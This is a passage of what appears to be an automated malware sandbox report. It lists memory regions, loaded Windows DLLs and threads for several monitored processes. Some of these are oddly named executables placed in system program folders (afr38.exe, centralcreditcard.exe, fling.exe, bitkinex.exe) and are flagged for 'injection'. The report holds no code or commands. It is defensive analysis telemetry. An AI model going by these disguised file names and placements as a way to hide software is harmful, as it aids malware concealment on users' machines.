end_va = 0x20affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 3872 start_va = 0x2230000 end_va = 0x223ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002230000" filename = "" Region: id = 3873 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3874 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3875 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3876 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3877 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3878 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 3879 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3880 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3881 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3882 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3883 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3884 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3885 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3886 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3887 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3888 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3889 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3890 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3891 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3892 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3893 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3894 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3895 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3896 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3897 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3898 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 199 os_tid = 0x1238 Thread: id = 200 os_tid = 0x110c Process: id = "39" image_name = "afr38.exe" filename = "c:\\program files (x86)\\windows portable devices\\afr38.exe" page_root = "0x69d83000" os_pid = "0x1204" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files (x86)\\Windows Portable Devices\\afr38.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows Portable Devices\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5051 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5052 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5053 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5054 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5055 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 5056 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 5057 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 5058 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 5059 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 5060 start_va = 0x210000 end_va = 0x210fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 5061 start_va = 0x220000 end_va = 0x223fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 5062 start_va = 0x240000 end_va = 0x24ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 5063 start_va = 0x250000 end_va = 0x30dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5064 start_va = 0x380000 end_va = 0x396fff monitored = 0 entry_point = 0x3814a1 region_type = mapped_file name = "afr38.exe" filename = "\\Program Files (x86)\\Windows Portable Devices\\afr38.exe" (normalized: "c:\\program files (x86)\\windows portable devices\\afr38.exe") Region: id = 5065 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5066 start_va = 0x600000 end_va = 0x6bbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 5067 start_va = 0x6c0000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 5068 start_va = 0x8c0000 end_va = 0xa47fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 5069 start_va = 0xa50000 end_va = 0xbd0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a50000" filename = "" Region: id = 5070 start_va = 0xbe0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000be0000" filename = "" Region: id = 5071 start_va = 0x2130000 end_va = 0x213ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002130000" filename = "" Region: id = 5072 start_va = 0x2170000 end_va = 0x217ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002170000" filename = "" Region: id = 5073 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5074 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5075 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5076 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 5077 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 5078 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 5079 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5080 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5081 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5082 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5083 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 5084 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5085 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 5086 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5087 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5088 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 5089 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5090 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5091 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 5092 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5093 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 5094 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 5095 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5096 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5097 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5098 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 201 os_tid = 0x12b4 Thread: id = 202 os_tid = 0x1208 Process: id = "40" image_name = "centralcreditcard.exe" filename = "c:\\program files\\msbuild\\centralcreditcard.exe" page_root = "0x1f8ae000" os_pid = "0x12b8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files\\MSBuild\\centralcreditcard.exe\" " cur_dir = "C:\\Program Files\\MSBuild\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 203 os_tid = 0x12d8 Thread: id = 204 os_tid = 0x12bc Process: id = "41" image_name = "fling.exe" filename = "c:\\program files\\windows media player\\fling.exe" page_root = "0x3e51a000" os_pid = "0x112c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files\\Windows Media Player\\fling.exe\" " cur_dir = "C:\\Program Files\\Windows Media Player\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4379 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4380 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4381 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4382 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4383 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4384 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4385 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4386 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4387 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4388 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 4389 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 4390 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4391 start_va = 0x430000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 4392 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4393 start_va = 0x520000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 4394 start_va = 0x760000 end_va = 0x8e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000760000" filename = "" Region: id = 4395 start_va = 0x8f0000 end_va = 0xa70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008f0000" filename = "" Region: id = 4396 start_va = 0xad0000 end_va = 0xadffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ad0000" filename = "" Region: id = 4397 start_va = 0xb20000 end_va = 0xb2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b20000" filename = "" Region: id = 4398 start_va = 0xb30000 end_va = 0xbebfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b30000" filename = "" Region: id = 4399 start_va = 0x12d0000 end_va = 0x12e6fff monitored = 0 entry_point = 0x12d14a1 region_type = mapped_file name = "fling.exe" filename = "\\Program Files\\Windows Media Player\\fling.exe" (normalized: "c:\\program files\\windows media player\\fling.exe") Region: id = 4400 start_va = 0x12f0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012f0000" filename = "" Region: id = 4401 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4402 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4403 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4404 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 4405 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 4406 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 4407 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4408 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4409 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4410 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4411 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4412 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4413 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4414 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4415 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4416 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4417 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4418 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4419 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 4420 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4421 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4422 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4423 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4424 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4425 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4426 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 205 os_tid = 0x1278 Thread: id = 206 os_tid = 0x1130 Process: id = "42" image_name = "bitkinex.exe" filename = "c:\\program files (x86)\\windows photo viewer\\bitkinex.exe" page_root = "0x5be42000" os_pid = "0x114c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\bitkinex.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows Photo Viewer\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT 